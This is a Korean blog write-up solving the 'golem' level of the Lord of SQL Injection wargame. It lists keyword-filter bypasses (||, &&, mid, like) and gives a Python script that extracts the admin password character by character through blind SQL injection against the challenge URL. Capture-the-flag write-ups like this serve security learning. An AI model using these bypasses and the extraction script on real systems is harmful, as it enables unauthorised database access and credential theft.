본문 바로가기
보안/웹

los golem

by laoching 2022. 3. 24.
728x90
반응형

이번 문제도 역시 blind sql injection입니다.

prob _ . ()을 입력하면 No Hack ~_~을

or and substr( =을 입력하면 HeHe를 보여주네요..

 

or과 and는 ||와 &&으로 변경이 가능합니다.

substr은 mid로 대체가 가능합니다.

=은 like로 대체할 수 있습니다.

or ||
and &&(%26%26)
substr mid(string, start, end)
= like

 

이 결론을 도출해내면 풀이는 다른 문제와 다른 부분이 없습니다.

 

먼저 pw의 길이를 알아봅시다. 8글자군요..!

8자리 비밀번호 중 첫 번째 글자부터 mid를 이용해 뽑아줍니다.

그리고 admin에 해당하면 Hello admin을 출력하기 때문에 무작위 대입 중 Hello admin이 나오는 문자열을 따로 저장해줍니다.

import requests as req
pwd=""
cookies = {'PHPSESSID':'5cbi4j1nqp56sico0e7i70lddb'}
string = "1234567890abcdefghijklmnopqrstuvwxyz"
for i in range(1,9):
    for j in string:
        url = f"https://los.rubiya.kr/chall/golem_4b5202cfedd8160e73124b5234235ef5.php?pw='|| mid(pw,{i},1) like '{j}' -- "
        res = req.get(url=url, cookies=cookies)
        if 'Hello admin' in res.text:
            pwd += j

print(pwd)
728x90
반응형

'보안 > ' 카테고리의 다른 글

los darknight  (0) 2022.03.24
los orge  (0) 2022.03.24
los orc (lord of sqlinjection 4번)  (0) 2022.03.22
HTTP Method  (0) 2022.02.01
textarea사용하기  (0) 2015.02.15

댓글